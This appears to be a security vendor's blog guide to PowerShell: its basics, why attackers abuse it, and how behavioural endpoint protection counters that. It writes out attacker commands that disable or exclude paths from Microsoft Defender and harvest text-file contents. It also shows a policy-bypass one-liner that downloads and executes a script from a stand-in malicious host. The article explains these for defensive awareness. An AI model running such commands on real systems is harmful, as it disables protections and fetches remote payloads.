Windows PowerShell is a powerful scripting language and command-line shell for automating tasks and managing configurations. This guide explores the features and capabilities of PowerShell, including its role in system administration and security.
Learn about common PowerShell commands, scripting best practices, and how to leverage PowerShell for cybersecurity purposes. Understanding PowerShell is essential for IT professionals and security practitioners.
How can PowerShell impact your business’s valuable assets? Learn the basics of PowerShell, why it’s attractive to hackers & how to protect the enterprise
Microsoft PowerShell is a command-line shell and scripting language used to automate tasks and manage Windows-based systems. It is commonly used by administrators and security professionals to automate routine tasks, manage and monitor systems, and automate responses to security incidents. Attackers often use PowerShell to gain unauthorized access to systems and execute malicious code.
Microsoft PowerShell has been available on Windows since as far back as 2006, but it is now the command shell for File Explorer on Windows 10 and has largely superseded the old cmd.exe tool. Although often viewed as arcane by ordinary users, PowerShell has become essential for IT teams and network administrators due to its flexibility and power. In this introductory guide, we’ll explain the basics of PowerShell, why it’s attractive to hackers and malware authors, and what you can do to protect your organization.
Choose Your Flavor
If you type ‘PowerShell’ into Cortana’s search field, you’ll be presented with a couple of options, PowerShell ISE and PowerShell Desktop app. On top of that, if you right-click the Start menu or either of the PowerShells’ Taskbar icons, you’ll see there’s two different ways to launch either version of PowerShell: as the current user or as an administrator.
Admins wishing to automate common tasks are likely to use the ISE interface to develop PowerShell modules and scripts, but for interactive use, most will choose the PowerShell Desktop app and run it either as an administrator or current user depending on the task.
You may also hear talk of PowerShell Core, a cross-platform, open-source edition that runs not only on Windows, but also Linux and macOS:
Watch out for this, though, as it installs as an unsigned binary and could easily be replaced by a malicious imposter. If you have endpoints using PowerShell Core, make sure your organization signs it with an appropriate certificate, or runs regular shasum checks to ensure that it hasn’t been tampered with.
Although there are some differences in capabilities between the different flavors of PowerShell, they all can run remote sessions over SSH and to interact with a wide variety of processes and services. PowerShell can even interact with the Windows registry and Event log. And all this means that an adversary with access to PowerShell has the same access and benefits.
Unleashing the Power
You can start to get an idea of PowerShell’s capabilities with two simple commands:
Get-Module -ListAvailable
to list the available modules, and
Get-Command
to list available commands:
Let’s take a quick look at some examples. Suppose you (or an adversary) are moving around inside a directory of documents and want to quickly find whether there’s anything interesting in it. A command such as the following one will output the first and last two lines of every text file in the directory, recursively descending child directories and including any hidden or invisible files, and piping the output to another text file for later perusal or retrieval:
Get-ChildItem -Force -R .*.txt | ForEach-Object {Get-Content $_ -TotalCount 2; Get-Content $_ -Tail 2} *>> o.log
If someone were looking for documents that might begin with “Confidential” or end with the author’s position like “Chief Financial Officer”, this could be a “quick and dirty” way to enumerate items of interest.
Deleting an item, perhaps to clear up any evidence of intrusion, is simply a matter of
Remove-Item <path>
PowerShell also allows users to manipulate the operating system in interesting and, alas, dangerous ways. If a malware author wants to bypass the pre-installed Microsoft Defender AV engine, running a PowerShell command with the appropriate privileges can either disable it:
Set-MpPreference -DisableRealTimeMonitoring $true
or, somewhat more stealthily, exclude a drive or path from its search paths:
Add-MpPreference -ExclusionPath “c:”
PowerShell also makes it simple for attackers to do things like enumerate your network drives and call the event log, a useful way to find exploitable information, with Get-PSDrive and Get-EventLog, respectively.
A useful tool for both users and bad actors is the ability to read the history of commands, including any arguments passed into them, that have been entered interactively on the command line. History is stored at the path output by this command:
(Get-PSReadLineOption).HistorySavePath
and we can use cat and the Select-String cmdlet (or its alias sls) to effectively “grep” or search the commands for items of interest (say, like passwords!):
Scripts & Exploit Kits
However, working with PowerShell on the command line isn’t where the best opportunities for malicious actors lie. More dangerous is PowerShell’s ability to run scripts both in-memory (aka “fileless” malware attacks) and from disk. Both of which can be executed either directly on a host or remotely.
Like the Unix shell eval command, PowerShell has Invoke-Expression (and its alias iex), which makes it possible to download and execute a malicious script in memory. We can add Bypass to try to circumvent a restricted execution policy:
powershell -ep Bypass —nop -c "iex(New-Object Net.WebClient).DownloadString('http://malicious.scripts.com/mlwr.ps1')"
Unsurprisingly, it hasn’t taken long for entire exploitation frameworks to appear that leverage PowerShell to its full potential.
First among these is PowerSploit, a collection of PowerShell scripts that can help manipulate and control a victim’s machine.
PowerShell Empire builds on the work of PowerSploit and several other projects to create a post-exploitation tool that can evade network detection, run keyloggers and execute other modules such as Mimikatz to extract plaintext passwords, password hashes and other data directly from memory.
The Rise of PowerShell Attacks
The creation of PowerShell scripts and PowerShell commands that can be run from other kinds of Windows files, .exe, .bat, .wsf, and .LNK is one of the reasons why PowerShell-based malware has been on the rise in recent years. With one estimate claiming that PowerShell exploits account for nearly 40% of malware incidents, there’s no doubt that adversaries are using it in a wide variety of campaigns, from ransomware to credential theft and banking Trojans. PowerShell has also been implicated in click-fraud, password-sniffing and data exfiltration.
DNSMessenger is malware that was spotted spreading in a Word document macro. It cleverly uses VBA source code to deliver encoded PowerShell commands to achieve persistence, deliver its payload and communicate with a C&C server.
Surprisingly, some PowerShell attacks do not even require the built-in PowerShell.exe. Tools like PowerShdll and InsecurePowerShell can execute scripts directly by leveraging the System.Management.Automation.dll that underlies the PowerShell binary. In short, the PowerShell executable is just a host or wrapper for the real code in the dynamic link library. Attacks can harness this to essentially cause any process to run PowerShell scripts and commands.
Other creative uses of PowerShell involve embedding a PowerShell script in the pixels of a PNG file and generating a one-liner to execute it using Invoke-PSImage, or converting PowerShell scripts into EXE file with tools like PS2EXE.
Managing PowerShell
It’s probably clear from all this that simply blocking the PowerShell.exe would be futile, not to mention a great burden on system administrators who have come to rely on what PowerShell offers. It’s important to understand that PowerShell and the DLLs that underlie it are integral parts of the Windows operating system, and with the advent of PowerShell Core, that power extends to opportunities for cross-platform administration that enterprises may find essential.
An effective enterprise solution for dealing with the dual nature of PowerShell is one like SentinelOne, that looks at the behavior of processes executing on the endpoint. This is effective because they operate similarly regardless of how malware attacks are implemented. The SentinelOne agent monitors all activities on the agent to differentiate between the malicious and the benign. Since the agent already holds the full context: users, processes, command line arguments, registry, files on the disk, and external communication, malicious activity can be mitigated regardless of the source.
Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.
Read more about Windows Security
- Hancitor Banking Trojan is Back | Using Malicious Word Attachment
- SentinelOne Detects and Blocks New Variant of Powershell CryptoWorm
- New Windows 10 File Type Can Be Abused for Running Malicious Applications